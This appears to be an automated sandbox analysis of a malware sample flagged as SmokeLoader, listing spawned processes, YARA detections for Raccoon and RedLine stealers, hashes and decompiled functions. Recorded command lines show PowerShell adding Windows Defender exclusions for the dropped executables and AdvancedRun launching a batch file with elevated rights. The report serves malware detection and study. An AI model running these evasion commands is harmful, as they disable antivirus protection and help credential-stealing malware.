File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000006.00000000.726672116.00000000044E1000.00000020.00020000.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: iwbavbe PID: 5156 Parent PID: 968

General

Start time:	20:49:31
Start date:	29/10/2021
Path:	C:\Users\user\AppData\Roaming\iwbavbe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\iwbavbe
Imagebase:	0x400000
File size:	349184 bytes
MD5 hash:	537AD79DD97C59FCD1DF5D8A26256192
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML
Reputation:	low

Chronological Activities

Analysis Process: 9A4B.exe PID: 5240 Parent PID: 3424

General

Start time:	20:49:31
Start date:	29/10/2021
Path:	C:\Users\user\AppData\Local\Temp\9A4B.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\9A4B.exe
Imagebase:	0x400000
File size:	345600 bytes
MD5 hash:	DBD80FF6104BC503DD52179301E3F75F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML
Reputation:	low

Chronological Activities

Analysis Process: 9A4B.exe PID: 3864 Parent PID: 5240

General

Start time:	20:49:38
Start date:	29/10/2021
Path:	C:\Users\user\AppData\Local\Temp\9A4B.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\9A4B.exe
Imagebase:	0x400000
File size:	345600 bytes
MD5 hash:	DBD80FF6104BC503DD52179301E3F75F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000C.00000002.807321223.0000000000460000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000C.00000002.807649884.00000000005A1000.00000004.00020000.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: iwbavbe PID: 6200 Parent PID: 5156

General

Start time:	20:49:43
Start date:	29/10/2021
Path:	C:\Users\user\AppData\Roaming\iwbavbe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\iwbavbe
Imagebase:	0x400000
File size:	349184 bytes
MD5 hash:	537AD79DD97C59FCD1DF5D8A26256192
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: 69B.exe PID: 6448 Parent PID: 3424

General

Start time:	20:49:52
Start date:	29/10/2021
Path:	C:\Users\user\AppData\Local\Temp\69B.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\69B.exe
Imagebase:	0x500000
File size:	512512 bytes
MD5 hash:	F57B28AEC65D4691202B9524F84CC54A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: SUSP_PE_Discord_Attachment_Oct21_1, Description: Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), Source: C:\Users\user\AppData\Local\Temp\69B.exe, Author: Florian Roth
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 39%, ReversingLabs
Reputation:	moderate

Chronological Activities

Analysis Process: 1254.exe PID: 1748 Parent PID: 3424

General

Start time:	20:49:55
Start date:	29/10/2021
Path:	C:\Users\user\AppData\Local\Temp\1254.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\1254.exe
Imagebase:	0x550000
File size:	512952 bytes
MD5 hash:	42758E2569239A774BECDB12698B124C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: SUSP_PE_Discord_Attachment_Oct21_1, Description: Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), Source: C:\Users\user\AppData\Local\Temp\1254.exe, Author: Florian Roth
Antivirus matches:	Detection: 100%, Joe Sandbox ML
Reputation:	low

Chronological Activities

Analysis Process: 20BD.exe PID: 6728 Parent PID: 3424

General

Start time:	20:49:59
Start date:	29/10/2021
Path:	C:\Users\user\AppData\Local\Temp\20BD.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\20BD.exe
Imagebase:	0x400000
File size:	212992 bytes
MD5 hash:	73252ACB344040DDC5D9CE78A5D3A4C2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000014.00000002.876148906.0000000004C51000.00000004.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000014.00000002.873601079.0000000002FB0000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000014.00000003.845161453.0000000002FB0000.00000004.00000001.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 80%, ReversingLabs
Reputation:	moderate

Chronological Activities

Analysis Process: iwbavbe PID: 1500 Parent PID: 968

General

Start time:	20:50:02
Start date:	29/10/2021
Path:	C:\Users\user\AppData\Roaming\iwbavbe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\iwbavbe
Imagebase:	0x400000
File size:	349184 bytes
MD5 hash:	537AD79DD97C59FCD1DF5D8A26256192
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: 31F4.exe PID: 5508 Parent PID: 3424

General

Start time:	20:50:03
Start date:	29/10/2021
Path:	C:\Users\user\AppData\Local\Temp\31F4.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\31F4.exe
Imagebase:	0xa0000
File size:	859648 bytes
MD5 hash:	AB823DF932B3C2941A9015848EBDB97B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low

Chronological Activities

Analysis Process: 3C84.exe PID: 4544 Parent PID: 3424

General

Start time:	20:50:05
Start date:	29/10/2021
Path:	C:\Users\user\AppData\Local\Temp\3C84.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\3C84.exe
Imagebase:	0xb10000
File size:	161280 bytes
MD5 hash:	9FA070AF1ED2E1F07ED8C9F6EB2BDD29
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: SUSP_PE_Discord_Attachment_Oct21_1, Description: Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), Source: C:\Users\user\AppData\Local\Temp\3C84.exe, Author: Florian Roth
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 43%, ReversingLabs

Chronological Activities

Analysis Process: 46D6.exe PID: 5104 Parent PID: 3424

General

Start time:	20:50:08
Start date:	29/10/2021
Path:	C:\Users\user\AppData\Local\Temp\46D6.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\46D6.exe
Imagebase:	0x400000
File size:	347136 bytes
MD5 hash:	31BE6099D31BDBF1ED339EFFDC1C7064
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000018.00000002.888009215.0000000002C40000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000018.00000002.890437795.00000000047D1000.00000004.00020000.sdmp, Author: Joe Security

Chronological Activities

Analysis Process: AdvancedRun.exe PID: 2812 Parent PID: 6448

General

Start time:	20:50:08
Start date:	29/10/2021
Path:	C:\Users\user\AppData\Local\Temp\8a05076d-68b0-45fb-9c83-e8cf76f7fdb4\AdvancedRun.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\AppData\Local\Temp\8a05076d-68b0-45fb-9c83-e8cf76f7fdb4\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\8a05076d-68b0-45fb-9c83-e8cf76f7fdb4\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
Imagebase:	0x400000
File size:	91000 bytes
MD5 hash:	17FC12902F4769AF3A9271EB4E2DACCE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: 31F4.exe PID: 7164 Parent PID: 5508

General

Start time:	20:50:11
Start date:	29/10/2021
Path:	C:\Users\user\AppData\Local\Temp\31F4.exe
Wow64 process (32bit):	true
Commandline:	31F4.exe
Imagebase:	0x950000
File size:	859648 bytes
MD5 hash:	AB823DF932B3C2941A9015848EBDB97B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: 5483.exe PID: 6408 Parent PID: 3424

General

Start time:	20:50:11
Start date:	29/10/2021
Path:	C:\Users\user\AppData\Local\Temp\5483.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\5483.exe
Imagebase:	0x400000
File size:	600576 bytes
MD5 hash:	05F6A0E8F711FABBBB97A544F92FC25C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Raccoon, Description: Yara detected Raccoon Stealer, Source: 0000001B.00000003.879658236.00000000048D0000.00000004.00000001.sdmp, Author: Joe Security

Chronological Activities

Analysis Process: AdvancedRun.exe PID: 6920 Parent PID: 2812

General

Start time:	20:50:15
Start date:	29/10/2021
Path:	C:\Users\user\AppData\Local\Temp\8a05076d-68b0-45fb-9c83-e8cf76f7fdb4\AdvancedRun.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\AppData\Local\Temp\8a05076d-68b0-45fb-9c83-e8cf76f7fdb4\AdvancedRun.exe' /SpecialRun 4101d8 2812
Imagebase:	0x400000
File size:	91000 bytes
MD5 hash:	17FC12902F4769AF3A9271EB4E2DACCE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: 9415.exe PID: 6216 Parent PID: 3424

General

Start time:	20:50:20
Start date:	29/10/2021
Path:	C:\Users\user\AppData\Local\Temp\9415.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\9415.exe
Imagebase:	0x9a0000
File size:	1988096 bytes
MD5 hash:	499FA9D12CBC441BF050DAD9FBB64D82
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET

Chronological Activities

Analysis Process: 31F4.exe PID: 4284 Parent PID: 3424

General

Start time:	20:50:23
Start date:	29/10/2021
Path:	C:\Users\user\AppData\Local\Temp\31F4.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\AppData\Local\Temp\31F4.exe'
Imagebase:	0x410000
File size:	859648 bytes
MD5 hash:	AB823DF932B3C2941A9015848EBDB97B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET

Chronological Activities

Analysis Process: AdvancedRun.exe PID: 5256 Parent PID: 4544

General

Start time:	20:50:24
Start date:	29/10/2021
Path:	C:\Users\user\AppData\Local\Temp\7c8ebbc4-8deb-40dd-b0f8-2d1ec9a44654\AdvancedRun.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\AppData\Local\Temp\7c8ebbc4-8deb-40dd-b0f8-2d1ec9a44654\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\7c8ebbc4-8deb-40dd-b0f8-2d1ec9a44654\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
Imagebase:	0x400000
File size:	91000 bytes
MD5 hash:	17FC12902F4769AF3A9271EB4E2DACCE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 3%, Metadefender, Browse Detection: 0%, ReversingLabs

Chronological Activities

Analysis Process: iwbavbe PID: 6284 Parent PID: 1500

General

Start time:	20:50:25
Start date:	29/10/2021
Path:	C:\Users\user\AppData\Roaming\iwbavbe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\iwbavbe
Imagebase:	0x400000
File size:	349184 bytes
MD5 hash:	537AD79DD97C59FCD1DF5D8A26256192
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: powershell.exe PID: 6116 Parent PID: 6448

General

Start time:	20:50:26
Start date:	29/10/2021
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\69B.exe' -Force
Imagebase:	0x13a0000
File size:	430592 bytes
MD5 hash:	DBA3E6449E97D4E3DF64527EF7012A10
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET

Chronological Activities

Analysis Process: conhost.exe PID: 6140 Parent PID: 6116

General

Start time:	20:50:27
Start date:	29/10/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff724c50000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: AdvancedRun.exe PID: 6968 Parent PID: 5256

General

Start time:	20:50:31
Start date:	29/10/2021
Path:	C:\Users\user\AppData\Local\Temp\7c8ebbc4-8deb-40dd-b0f8-2d1ec9a44654\AdvancedRun.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\AppData\Local\Temp\7c8ebbc4-8deb-40dd-b0f8-2d1ec9a44654\AdvancedRun.exe' /SpecialRun 4101d8 5256
Imagebase:	0x400000
File size:	91000 bytes
MD5 hash:	17FC12902F4769AF3A9271EB4E2DACCE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: 31F4.exe PID: 3476 Parent PID: 4284

General

Start time:	20:50:33
Start date:	29/10/2021
Path:	C:\Users\user\AppData\Local\Temp\31F4.exe
Wow64 process (32bit):
Commandline:	31F4.exe
Imagebase:
File size:	859648 bytes
MD5 hash:	AB823DF932B3C2941A9015848EBDB97B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: aspnet_regbrowsers.exe PID: 6060 Parent PID: 6448

General

Start time:	20:50:38
Start date:	29/10/2021
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
Wow64 process (32bit):
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
Imagebase:
File size:	45160 bytes
MD5 hash:	B490A24A9328FD89155F075FA26C0DEC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000025.00000000.924712591.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000025.00000000.937590546.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000025.00000000.932395754.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000025.00000000.928126221.0000000000402000.00000040.00000001.sdmp, Author: Joe Security

Chronological Activities

Analysis Process: powershell.exe PID: 5680 Parent PID: 4544

General

Start time:	20:50:41
Start date:	29/10/2021
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\3C84.exe' -Force
Imagebase:	0x13a0000
File size:	430592 bytes
MD5 hash:	DBA3E6449E97D4E3DF64527EF7012A10
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: F7E3DjYJpC.exe PID: 6476 Parent PID: 6128 F7E3DjYJpC.exeCOMMON

Executed Functions

Function 00424690, Relevance: 1.5, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

RtlEncodePointer.NTDLL(00000000,?,0041D04B,?,?,00424800), ref: 00424697

Memory Dump Source

Source File: 00000000.00000002.687486155.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.687483402.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.687507828.000000000043E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.687718793.0000000002B97000.00000002.00020000.sdmp Download File

Similarity

API ID: EncodePointer
String ID:
API String ID: 2118026453-0
Opcode ID: 2ea03846aa0b567229e74ed0acf05d785ccbcc0ad5cbdc7d91d64925a7e8509b
Instruction ID: d35c21fdf9697fae3b8ca4ac9df821949a654717cf36e16e5de8d48c8df027d1
Opcode Fuzzy Hash: 2ea03846aa0b567229e74ed0acf05d785ccbcc0ad5cbdc7d91d64925a7e8509b
Instruction Fuzzy Hash: 10A01132088208A3C2002282A80AF023A0CE3CCBA2F080020F20C0A0A00AA2A82080AA

Uniqueness

Uniqueness Score: -1.00%

Function 0041C890, Relevance: 1.5, APIs: 1, Instructions: 5
COMMON

Download Yara Rule

C-Code - Quality: 100%

			_entry_() {
				void* _t3;
				void* _t4;

				E00421A60(); // executed
				return L0041C8B0(_t3, _t4);
			}

0x0041c895
0x0041c8a0

APIs

___security_init_cookie.LIBCMTD ref: 0041C895

Memory Dump Source

Source File: 00000000.00000002.687486155.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.687483402.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.687507828.000000000043E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.687718793.0000000002B97000.00000002.00020000.sdmp Download File

Similarity

API ID: ___security_init_cookie
String ID:
API String ID: 3657697845-0
Opcode ID: 989a3b1cde8d75633caca1be5d45cca953f1b250fff02efc506c9fb5d63ec8e4
Instruction ID: f581d8896d31454078740312df8d18a426b6ba7321f9ba9bd526a071552ec979
Opcode Fuzzy Hash: 989a3b1cde8d75633caca1be5d45cca953f1b250fff02efc506c9fb5d63ec8e4
Instruction Fuzzy Hash: ABA0026154569C16155133A71987A4A754D48D07597D5001B7519021135D5CA98240AE

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00426440, Relevance: 7.6, APIs: 5, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00426440(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
				intOrPtr _v0;
				void* _v804;
				intOrPtr _v808;
				intOrPtr _v812;
				intOrPtr _t6;
				intOrPtr _t11;
				long _t15;
				intOrPtr _t19;
				intOrPtr _t20;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				intOrPtr _t25;
				intOrPtr* _t29;
				void* _t34;

				_t25 = __esi;
				_t24 = __edi;
				_t22 = __edx;
				_t20 = __ecx;
				_t19 = __ebx;
				_t6 = __eax;
				_t34 = _t20 -  *0x43e4a0; // 0x99b59b49
				if(_t34 == 0) {
					asm("repe ret");
				}
				 *0x43ff40 = _t6;
				 *0x43ff3c = _t20;
				 *0x43ff38 = _t22;
				 *0x43ff34 = _t19;
				 *0x43ff30 = _t25;
				 *0x43ff2c = _t24;
				 *0x43ff58 = ss;
				 *0x43ff4c = cs;
				 *0x43ff28 = ds;
				 *0x43ff24 = es;
				 *0x43ff20 = fs;
				 *0x43ff1c = gs;
				asm("pushfd");
				_pop( *0x43ff50);
				 *0x43ff44 =  *_t29;
				 *0x43ff48 = _v0;
				 *0x43ff54 =  &_a4;
				 *0x43fe90 = 0x10001;
				_t11 =  *0x43ff48; // 0x0
				 *0x43fe44 = _t11;
				 *0x43fe38 = 0xc0000409;
				 *0x43fe3c = 1;
				_t21 =  *0x43e4a0; // 0x99b59b49
				_v812 = _t21;
				_t23 =  *0x43e4a4; // 0x664a64b6
				_v808 = _t23;
				 *0x43fe88 = IsDebuggerPresent();
				_push(1);
				E00426420(_t12);
				SetUnhandledExceptionFilter(0);
				_t15 = UnhandledExceptionFilter(0x409f6c);
				if( *0x43fe88 == 0) {
					_push(1);
					E00426420(_t15);
				}
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}

0x00426440
0x00426440
0x00426440
0x00426440
0x00426440
0x00426440
0x00426440
0x00426446
0x00426448
0x00426448
0x0042e9ab
0x0042e9b0
0x0042e9b6
0x0042e9bc
0x0042e9c2
0x0042e9c8
0x0042e9ce
0x0042e9d5
0x0042e9dc
0x0042e9e3
0x0042e9ea
0x0042e9f1
0x0042e9f8
0x0042e9f9
0x0042ea02
0x0042ea0a
0x0042ea12
0x0042ea1d
0x0042ea27
0x0042ea2c
0x0042ea31
0x0042ea3b
0x0042ea45
0x0042ea4b
0x0042ea51
0x0042ea57
0x0042ea63
0x0042ea68
0x0042ea6a
0x0042ea74
0x0042ea7f
0x0042ea8c
0x0042ea8e
0x0042ea90
0x0042ea95
0x0042eaad

APIs

IsDebuggerPresent.KERNEL32 ref: 0042EA5D
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0042EA74
UnhandledExceptionFilter.KERNEL32(00409F6C), ref: 0042EA7F
GetCurrentProcess.KERNEL32(C0000409), ref: 0042EA9D
TerminateProcess.KERNEL32(00000000), ref: 0042EAA4

Memory Dump Source

Source File: 00000000.00000002.687486155.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.687483402.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.687507828.000000000043E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.687718793.0000000002B97000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: c59e8f8781e30871d07173c26a070c807a816239214ee763875908e28398e7d7
Instruction ID: cfa9524a3b12b8b773824b8592d4e3ae2adb55ecfbbfffa1025ce60c7e413f30
Opcode Fuzzy Hash: c59e8f8781e30871d07173c26a070c807a816239214ee763875908e28398e7d7
Instruction Fuzzy Hash: 8621F0B9D012049BC300DF55FA866487BA4BB5E325F60607BED08963B2E7B45989CF4E

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: F7E3DjYJpC.exe PID: 6860 Parent PID: 6476 F7E3DjYJpC.exeCOMMON

Executed Functions

Function 004017EA, Relevance: 3.1, APIs: 2, Instructions: 54sleepnativeCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 00401896
NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 004018BE

Memory Dump Source

Source File: 00000004.00000002.741438852.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ProcessSleepTerminate
String ID:
API String ID: 417527130-0
Opcode ID: 093506dd62a563d0441f59a8a05229de1ffc0c7044889409d056a06326e13c21
Instruction ID: e26adff564c5d3d37a4e8030c80122da76794021b5cb737f4d399c49089bd509
Opcode Fuzzy Hash: 093506dd62a563d0441f59a8a05229de1ffc0c7044889409d056a06326e13c21
Instruction Fuzzy Hash: 7001B537604205EADB007EB59D819A93B68AF04365F248777BA12B91F1C938C652A71B

Uniqueness

Uniqueness Score: -1.00%

Function 0040185B, Relevance: 3.0, APIs: 2, Instructions: 50sleepnativeCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 00401896
NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 004018BE

Memory Dump Source

Source File: 00000004.00000002.741438852.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ProcessSleepTerminate
String ID:
API String ID: 417527130-0
Opcode ID: 1770049ace98a7458e43cc493052677b39fde3cfbd9b887cff6db6baf57fddbe
Instruction ID: a7be6de418827693af2ab350a5dd922dd862006562865765dfea97ffb81bfcac
Opcode Fuzzy Hash: 1770049ace98a7458e43cc493052677b39fde3cfbd9b887cff6db6baf57fddbe
Instruction Fuzzy Hash: BF014F33604204FAEB047A929C45DAA3628AB04355F30C533BA13B90F1D97CCB12A72B

Uniqueness

Uniqueness Score: -1.00%

Function 00401866, Relevance: 3.0, APIs: 2, Instructions: 45sleepnativeCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 00401896
NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 004018BE

Memory Dump Source

Source File: 00000004.00000002.741438852.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ProcessSleepTerminate
String ID:
API String ID: 417527130-0
Opcode ID: dc1226d4bc2db8ad8be4ba055d694b18d68c57301a1c136da16781e7116eb212
Instruction ID: e54376f1e00a1b05e1b0a4da34ea36749e6d38f0b530b75836749d90234edb27
Opcode Fuzzy Hash: dc1226d4bc2db8ad8be4ba055d694b18d68c57301a1c136da16781e7116eb212
Instruction Fuzzy Hash: DB018637604204EBDB047AD29C41EAA3725AF14315F24C177FE12BA0F1D53D8712A72B

Uniqueness

Uniqueness Score: -1.00%

Function 00401884, Relevance: 3.0, APIs: 2, Instructions: 40sleepnativeCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 00401896
NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 004018BE

Memory Dump Source

Source File: 00000004.00000002.741438852.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ProcessSleepTerminate
String ID:
API String ID: 417527130-0
Opcode ID: 06c47be1babc5c9914373f87bf5e5a6e30058494f01aa4c1fe81d8ba10f9d84d
Instruction ID: 5cccd4a7217d25da87a080ae0d04b05742d3a6582cdde403d0d4fd1f208729a0
Opcode Fuzzy Hash: 06c47be1babc5c9914373f87bf5e5a6e30058494f01aa4c1fe81d8ba10f9d84d
Instruction Fuzzy Hash: DFF01237644205FBDB047A919C41EAA3729AF44355F20C137BB13790F1C57C8652A72B

Uniqueness

Uniqueness Score: -1.00%

Function 0040187A, Relevance: 3.0, APIs: 2, Instructions: 39sleepnativeCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 00401896
NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 004018BE

Memory Dump Source

Source File: 00000004.00000002.741438852.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ProcessSleepTerminate
String ID:
API String ID: 417527130-0
Opcode ID: d2cc8ded923418a485b63d44c0e9af69491e3bef1ae54f85540c04aa078cd151
Instruction ID: 5d822ad72a3bc969102d855418471fb3ff8b776078c2435d27f60d427d7e2b1d
Opcode Fuzzy Hash: d2cc8ded923418a485b63d44c0e9af69491e3bef1ae54f85540c04aa078cd151
Instruction Fuzzy Hash: 88F0FF33604205EBDB047AD59C41EAA3729AF04315F20C537BA12790F1CA3D8612AB2B

Uniqueness

Uniqueness Score: -1.00%

Function 004018D3, Relevance: 1.5, APIs: 1, Instructions: 45
nativeCOMMON

Download Yara Rule

C-Code - Quality: 46%

			E004018D3(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edi) {

				 *__eax =  *__eax + __eax;
				__eax = L0040118A(__eax, __ebx, __ecx, __edi, __eflags);
				_pop(__edi);
				_pop(__ebx);
				__esp = __ebp;
				_pop(__ebp);
				return __eax;
			}

0x004018db
0x004018e5
0x004018ea
0x004018ec
0x004018ed
0x004018ed
0x004018ee

APIs

NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 004018BE

Memory Dump Source

Source File: 00000004.00000002.741438852.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ProcessTerminate
String ID:
API String ID: 560597551-0
Opcode ID: 2828a8cd754e6382065d6a4fb934443d5e18941ecfa79c6ebd95b6c34ee4dc7b
Instruction ID: 169e4967cc86e0c75baf1baab42a0cf60a3c7d0871e4951e2e4ac70a2d426d6d
Opcode Fuzzy Hash: 2828a8cd754e6382065d6a4fb934443d5e18941ecfa79c6ebd95b6c34ee4dc7b
Instruction Fuzzy Hash: 49F0C873604150EBD7013AA19C42AF63769EF01321F248137F923A50F1C63D8612B72B

Uniqueness

Uniqueness Score: -1.00%

Function 00401888, Relevance: 1.5, APIs: 1, Instructions: 37nativeCOMMON

Download Yara Rule

APIs

NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 004018BE

Memory Dump Source

Source File: 00000004.00000002.741438852.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ProcessTerminate
String ID:
API String ID: 560597551-0
